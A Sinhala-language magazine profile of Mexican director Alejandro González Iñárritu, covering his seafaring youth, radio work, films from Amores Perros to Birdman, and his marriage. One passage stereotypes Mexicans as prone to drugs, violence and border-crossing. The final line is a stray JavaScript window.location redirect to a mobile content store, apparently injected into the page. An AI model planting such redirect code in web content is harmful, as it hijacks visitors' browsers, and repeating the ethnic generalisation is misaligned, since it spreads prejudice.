අල්හන්ද්‍රෝ නම් මැක්සිකානුවා

කේ.සංජීව
සුමුදු අතුකෝරල

ඔහුගේ නම අල්හන්ද්‍රෝ ගොන්සාලෙස් ඉනාරිටු (Alehandro Gonzales Inarritu). උපත 1963 අගෝස්තු 15 මෙක්සිකෝ සිටි නගරයය. ඔහු අද ලෝ-ප‍්‍රකට සිනමාකරුවෙක්. ඔහු මෑතකදී නිෂ්පාදනය කළ Bridman චිත‍්‍රපටයට හොඳම චිත‍්‍රපටය, හොඳම අධ්‍යක්ෂණය ඇතුලූ සම්මාන රැුසක් ලැබුණා. අල්හන්ද්‍රෝගේ ජීවිතය සුන්දර චාරිකාවක්. මෙක්සිකෝ සිටි නගරයෙන් පටන් ගත්ත මේ චාරිකාව යුරෝපය, අප‍්‍රිකාව හරහා අද හොලිවුඞ්වලටත් ඇවිත්. ඒක ඔහුගේ සිනමා කෘති වගේම විචිත‍්‍රයි.

අල්හන්ද්‍රෝ නැව් නගී

අල්හන්ද්‍රෝ මුලින්ම කාගෝ සීමන් කෙනෙක්. අල්හන්ද්‍රෝගේ වයස 16ක් වෙනකොට තමයි නැව් නගින්නේ. වයස 18ක් වෙනකම් අවුරුදු දෙකක් ඔහු සයුර මත සරනවා. අප‍්‍රිකාවට යනවා. යුරෝපයට යනවා. මේ සරණ ජීවිතය ඇතුලේ තමයි පසුකලෙක සිනමාව හරහා එළියට විසිකරන්න අත්දැකීමක් එකතු කරගන්නේ. කතාවට කියන්නේ මෙක්සිකානුවෝ අහිකුණ්ඨකයෝ වගේ ජාතියක් කියලා. ඇවිදීම මෙක්සිකානුවන්ගේ රුධිරයේ තියෙනවා. මේ හින්දා වෙන්න ඇති එයාලා නිතරම බෝඩරය පැනලා උතුරු ඇමරිකාවට රිංගන්නේ. මෙක්සිකෝ-ඇමරිකා බෝඩරය තමයි ලෝකයේ නීති විරෝධී මත්ද්‍රව්‍ය ජාවාරමේ කේන්ද්‍රය. ප‍්‍රචණ්ඩත්වය වගේ දේවල් මැක්සිකානුවන්ගේ ජීවිතය ඇතුලේ අනෙක් ජාතීන්ට වඩා සුලභයි.

රේඩියෝ ජීවිතය

අල්හන්ද්‍රෝ කාගෝ නැවෙන් බැහැලා කෙලින්ම යන්නේ මෙක්සිකෝවල තියෙන ජනප‍්‍රිය රේඩියෝ ස්ටේෂන් එකකට. ඒකෙ නම WFM. ඒ 1982 අවුරුද්ද. මුලින්ම ඞී.ජේ. කෙනෙක්. පස්සෙ ඔහු රේඩියෝ ස්ටේෂන් එකේ අධ්‍යක්ෂ වෙලා තමයි නතර වෙන්නේ. අල්හන්ද්‍රෝ රේඩියෝ එකේ වැඩකරපු මේ කාලය තමයි WFM’ රේඩියෝව මෙක්සිකෝව පුරාම ලොකුම ජනප‍්‍රියතාව ලබා ගත්තේ. ඒක අල්හන්ද්‍රෝගේ දක්ෂතාව. අල්හන්ද්‍රෝ ඇතුලේ හොඳ සංගීත නිර්මාපකයකුත් ජීවත් වුණා. අදටත් ඔහුගේ සිනමාව ඇතුලේ සංගීතය ප‍්‍රභලයි. 1987-1989 කියන අවුරුදු දෙක ඇතුලේ අල්හන්ද්‍රෝ සංගීත සංරචකයකු විදිහට චිත‍්‍රපට 6කටම දායක වුණා.

මුල්ම චිත‍්‍රපටය

අල්හන්ද්‍රෝගේ මුල්ම චිත‍්‍රපටයAmores Perros මේක තිරගත වෙන්නේ 2000 අවුරුද්දේ. මේ චිත‍්‍රපටියත් එක්ක සිනමා ලෝකය අල්හන්ද්‍රෝව එක රැුයින් අල්ල ගන්නවා. සිනමාව කියන්නේ මැජික් එකක්. ඒක කරලා ඉවර වුණාට පස්සේ කළේ් කොහොමද කියලා කියන්නේ කොහොමද? අල්හන්ද්‍රෝ විචාරකයන් ගෙන් අහනවා. අල්හන්ද්‍රෝ මෙතැන ඉදලා දිගටම මේ මැජික් එක, එක එක නම් වලින් අපේ ඉස්සරහට ගේනවා. Amores Perros නිර්මාණය වෙන්නේ ස්පාඤ්ඤ භාෂාවෙන්. මේ චිත‍්‍රපටය ඔස්කාර් සම්මාන උළෙල ඇතුළේ හොඳම විදෙස් භාෂා චිත‍්‍රපටයට හිමි සම්මානයට නිර්දේශ වෙනවා. මේ චිත‍්‍රපටය මේ කාලයේ චිත‍්‍රපටිත් එක්ක බලනකොට ලොකු වෙනසක්. මේ චිත‍්‍රපටිය ඇතුලේ අල්හන්ද්‍රෝ එකිනෙකට වෙනස් කතා තුනක් සමාන්තරව පිහිටවනවා. මේ කතා තුනෙන් කියන්නේ මෙක්සිකානුවන්ගේ ජීවිතය ගැන.. ආදරය ගැන… ඔවුන් ඇතුළේ කැකෑරෙන ප‍්‍රචණ්ඩත්වය ගැන. හැබැයි මේ කතා තුන හරහා අල්හන්ද්‍රෝ දක්ෂ කිමිදුම්කරුවෙක් වෙලා මෙක්සිකානු සමාජයේ අභ්‍යන්තරයටම කිමිදෙනවා. මේ චිත‍්‍රපටයේ සංස්කරණයත්් හරිම අමුතුයි. ඒක ඇතුළෙත් අල්හන්ද්‍රෝ කරන්නේ ආදරය, ලිංගිකත්වය වගේ දේවල් මෙක්සිකානු රිද්මය ඇතුළේ එකට අමුණන එක.

මේ චිත‍්‍රපටිය එවක ලෝක සිනමාවට කොච්චර බලපෑවද කියනවා නම් මේ ආකෘතියේ චිත‍්‍රපටි ලෝකයේ හැමතැනම තැනෙන්න පටන් ගත්තා. ලංකාවෙත් ප‍්‍රසන්න විතානගේ ඉර මැදියම නමින් කරපු චිත‍්‍රපටියේ ආකෘතිය මෙම කෘතියේ ආකෘතියට සමානයි. ඒ වගේම සංජීව පුෂ්පකුමාරගේ ඉගිල්ලෙන මාළුවෝ. මේ කෘතියේ තිබුණ මේ සුවිශේෂී තත්ත්වය නිසාම වෙන්න ඇති 2000 අවුරුද්දේ කාන් විචාරක සම්මානය මේ කෘතියට ලැබෙන්නේ.

ග‍්‍රෑම් 21

Amores Perros චිත‍්‍රපටිය ඔස්කාර් සම්මාන උළෙල ඇතුලේ තිරගත වුණාට පස්සේ අල්හන්ද්‍රෝට හොලිවුඞ්වලට ටිකට් එක ලැබෙනවා. අල්හන්ද්‍රෝගේ දෙවන චිත‍්‍රපටය තමයි 21 Grams. මේකත් හරිම සුවිශේෂී. මුල් විනාඩි කිහිපයේ සංස්කරණය හරිම වෙහෙසකරයි. ඒ වගේම අපූරුයි. මිනිසෙක් මැරුණහම ඔහුගේ හෝ ඇයගේ ශරීරයේ බරින් ග‍්‍රෑම් 21ක් අඩු වෙනවාලූ. මේක තමයි මේ චිත‍්‍රපටියට නිමිත්ත වෙන්නේ. පුද්ගලයෙක් හදිස්සි අනතුරකින් මියයනවා. ඔහුගේ හදවත තවත් කෙනකුට බද්ධ කරනවා. දෙවෙනි පුද්ගලයා හදවත අයිතිකරුවාව සොයනවා. ඔහුට හදවතේ හිමිකරුගේ ප‍්‍රිය බිරිඳ මුණ ගැසෙනවා. ඔවුන් ආදරයක වෙළෙනවා. මේ ආදරය ඇතුළේ තමන්ගේ සැමියාගේ මරණයට හේතුවුණ රිය අනතුර සිදුකළ අනෙක් පුද්ගලයාගෙන් පළිගන්න ඇය උත්සාහ කරනවා. ඇය ඔහුව පළිගැනීමට මෙහෙයවනවා. හදවත බද්ධ කරගත්ත පෙම්වතා අවසාන මොහොතේදී මේ පළිගැනීමේ ක‍්‍රියාවලියට තිත තියෙනවා.

මේ චිත‍්‍රපටිය අල්හන්ද්‍රෝගේ ජීවිතයට ගොඩක් ළඟයි. අල්හන්ද්‍රෝගේ පළමු පුතා ඉපදිලා දවස් දෙකෙන් මියයනවා. අල්හන්ද්‍රෝ මුලින් හිතන්නේ මේ මරණයට හේතුව ඩොක්ටර්ස්ලා මුලින්ම වසන් කළා කියලා. හේතුව නිවැරදිව කිව්වා නම් පුතා බේරගන්න තිබුණා. අල්හන්ද්‍රෝට එහෙම හිතෙනවා. ඔහු පළිගන්න කල්පනා කරනවා. ඔහු පස්සේ කියනවා ඒක ඒ වෙලාවේ අතහැරලා දැම්මේ නැත්නම් ඔහුට පිස්සු වැටෙන්න ඉඩ තිබුණා කියලා. ඒ මරණයේ කම්පනය ඔහුගේ හැම චිත‍්‍රපටයකම තිබුණා. ඒක ගොඩක් මතුපිට තලයේ කැපී පෙනෙන්න වුණේ Beutiful කියන චිත‍්‍රපටයේ. බියුටිෆුල් කියන්නේ මරණය ගැන චිත‍්‍රපටියක් නෙවෙයි. ඒක ජීවිතය ගැනයි. ඔහු විචාරකයන්ට කියනවා. චිත‍්‍රපටිය කියන්නේම මගේ ජවිතයේ දිගුවක්. ඔව් අල්හන්ද්‍රෝගේ චිත‍්‍රපටි බැලූවහම ඒක පේනවා. බියුටිෆුල් කරන්න කලින් තමයි අල්හන්ද්‍රෝ Babel  කරන්නේ. මේ චිත‍්‍රපටියත් හරිම වෙනස්. ෆිල්ම් එක ඇතුලේ භාෂා 4ක් යනවා. රටවල් 4ක් පසුබිම් වෙනවා. මෙක්සිකෝව, ඇමරිකාව, ජපානය සහ මොරොක්කෝව තමයි ඒ රටවල් හතර. මේ චිත‍්‍රපටිය නිසා ඔහු හොඳම අධ්‍යක්ෂකවරයා ලෙස කාන් සිනමා සම්මානයට පාත‍්‍ර වෙනවා. සිනමා අධ්‍යක්ෂකවරයකුට ලබන්නට පුළුවන් ඉහළම සම්මානය තමයි මේක.

සුපර් හීරෝ

අල්හන්ද්‍රෝගේ අවසන් වරට තිරගත වුණ චිත‍්‍රපටිය තමයි Birdman. මේ චිත‍්‍රපටියට හොඳම චිත‍්‍රපටිය, හොඳම අධ්‍යක්ෂණය වගේ සම්මාන ගොඩක් ලැබුණා. ඒ ඔස්කාර් රාත‍්‍රියේදී. ඒ සම්මානවල සතුට එක්ක අල්හන්ද්‍රෝට මේ ලැබුණ සම්මානයත් එක්ක ඔස්කාර් සම්මාන උළෙල ඇතුළේ එක ළඟින් අවුරුදු දෙකකදීම මෙක්සිකානු අධ්‍යක්ෂක වරුන් දෙදෙනෙක් හොඳම අධ්‍යක්ෂණයට හිමි ඔස්කාර් සම්මානය ලබාගන්නවා. ඒකත් මැක්සිකානුවන්ට සුවිශේෂියි. මේ චිත‍්‍රපටිය ඇතුළේ අල්හන්ද්‍රෝ කතාකරන්නේ සුපර් හීරෝ වගේ හිටපු වේදිකා නළුවෙක් ගැන. පශ්චාත්තාපයක් වගේ හැඟීමක් තමයි චිත‍්‍රපටිය පුරාම විසිරිලා තියෙන්නේ. මේක තමන් ගැනම කරපු චිත‍්‍රපටියක්ද? අපට හිතෙනවා.

දශක දෙකක ආදරයක්

අල්හන්ද්‍රෝ කියන විදිහට මිනිහගේ විවාහයට දශක දෙකක්. හැම උදෑසනකම මම ඔබට ආදරෙයි කියලා දෙදෙනාම කියනවලූ… ඇය Maria Eladia. 21 Grams චිත‍්‍රපටිය පුද දෙන්නෙත් ඇයටමයි. ඒක සුවිශේෂී වෙන්න ඇති. ඒ මොකද පළමු පුතා දින දෙකකින් මියගියාට පස්සේ ඒ කම්පනය ඇයටත් දැනෙන්න ඇති. හොලිවුඞ්වල ආදරය, ජීවිතය වගේ බැඳීම්වලට ඒ තරම් දුරක් නැහැ. ඒත් කාගෝ නැවට නැගලා හොලිවුඞ්වලට සේන්දු වුණ මේ නාවිකයාගේ ආදරයට දශක දෙකක් ගතවෙලා. ඔහු හොලිවුඞ්වලට ආවට පස්සේ ඉංග‍්‍රීසි භාෂාවෙන් චිත‍්‍රපටි කරනවා. ඒත් ඔහු ස්පාඤ්ඤ භාෂාවට තවමත් ආදරෙයි. ඒ හින්දා Amores Perros වලට පස්සේ Beutiful ඔහු කරන්නේ ස්පාඤ්ඤ භාෂාවෙන්. චිත‍්‍රපටියක් කරන්න තුවක්කුවකුයි,කෙල්ලෙකුයි හිටියාම ඇති කියලා තමයි ගොඩාට්ක් කිව්වේ. අල්හන්ද්‍රෝත් Amores Perros පටන් ගත්තේ මෙතැනින්. එහෙත් අද වෙනකොට ඔහුගේ සිනමා චාරිකාව තියෙන්නේ අපිට හිතාගන්නවත් බැරි තැනක. හරියට මැජික් එකක් වගේ. අල්හන්ද්‍රෝගේ සිනමා චාරිකාව තවමත් ඉවර නැහැ. ඔහුගේ හොඳම චිත‍්‍රපටිය තවම තැනිලා නැහැ කියලා තමයි අපිට නම් හිතෙන්නේ.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;